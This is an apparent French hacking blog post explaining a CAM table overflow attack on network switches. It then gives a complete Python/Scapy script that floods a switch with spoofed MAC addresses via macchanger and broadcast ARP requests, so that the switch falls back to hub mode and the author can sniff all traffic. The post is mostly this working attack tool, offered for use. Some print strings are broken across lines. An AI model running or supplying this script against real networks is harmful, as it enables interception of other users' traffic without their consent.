CAM Table Overflow



Les switch enregistre les adresses MAC et leurs ports correspondant dans une table appelé Table CAM (Content Addressable Memory) pour pouvoir effectuer son routage correctement, cependant si cette table est plein (overflow) le switch prend un comportement différent afin d'économiser ses ressources, il se comporte comme un simple hub et n'utilise plus la table CAM, ce qui nous permet de recevoir tout le trafic.

Pour ce faire ,j'ai programmer un petit script python utilisant scapy qui exécute cette attaque. 

#!/usr/bin/python
#Author: Storn
#
#Flood the Switch's CAM Table with a lot Fake MAC Adress
#which drives the switch in HUB Mode then go to sniff :p
#
#Use MacChanger and Scapy
#
#argv[1] = Iface
#argv[2] = Loop or Endless loop by default
#

from scapy.all import *
import random
import sys
import os

# Random Mac Adress
def mac_gen():
 hexa = [0,1,2,3,4,5,6,7,8,9,"a","b","c","d","e","f"]
 a = 1
 b = 0
 spoof_mac = ""
 while a != 7:
  while b != 2:
   rnd = random.randint(0, 15)
   spoof_mac = str(spoof_mac) + str(hexa[rnd])
   b = b + 1
  if a != 6:
   spoof_mac = str(spoof_mac) + ":"
  a = a + 1
  b = 0
 return str(spoof_mac)


# Random IP Adress
def ip_gen():
 i = 1
 spoof_ip = ""
 while i != 5:
  rnd = random.randint(0, 255)
  spoof_ip = str(spoof_ip) + str(rnd)
  if i != 4:
   spoof_ip = str(spoof_ip) + "."
  i = i + 1
 return str(spoof_ip)


# Send ARP packet
def send_packet(src_mac, src_ip, dst_ip, intface):
 ether = Ether(dst= "ff:ff:ff:ff:ff:ff")
 arp   = ARP(op="who-has", psrc = src_ip, pdst = dst_ip, hwsrc = src_mac, hwdst = "ff:ff:ff:ff:ff:ff")
 mac_backet = ether/arp  
 # mac baguette? NULL! :Troll:
 
 sendp(mac_backet, iface = intface)

# Mac spoofing
def mac_spoof(mac_addr, intface):
 os.system("ifconfig " + intface + " down")
 os.system("macchanger -m " + mac_addr + " " + intface)
 os.system("ifconfig " + intface + " up")

# Main
if __name__ == "__main__":

 os.system("clear")

 if len(sys.argv) < 2:
  print sys.argv[0] + " <Iface> <Loop or Endless loop by default>"
  sys.exit() 


 if len(sys.argv) < 3:
  while 1:
   srcmac = mac_gen()
   srcip = ip_gen()
   dstip = ip_gen()
   try:
    mac_spoof(srcmac, sys.argv[1])
    send_packet(srcmac, srcip, dstip, sys.argv[1])
   except: 
    print "
[!] Can't Send ARP packet... Retry...
"
    sys.exit()
   else:
    print "

[*] " + srcmac + " > ff:ff:ff:ff:ff:ff"
    print "
    Who has " + dstip + "? Tell " + srcip + "
"

 else:
  l = 0
  while l != int(sys.argv[2]):
   srcmac = mac_gen()
   srcip = ip_gen()
   dstip = ip_gen()
   try:
    mac_spoof(srcmac, sys.argv[1])
    send_packet(srcmac, srcip, dstip, sys.argv[1])
   except: 
    print "
[!] Can't Send ARP packet... Retry...
"
    sys.exit()
   else:
    print "

[*] " + srcmac + " > ff:ff:ff:ff:ff:ff"
    print "
    Who has " + dstip + "? Tell " + srcip + "
"
   l = l+1
  print "

[+] Attack Completed with " + str(sys.argv[2]) + " Packets
"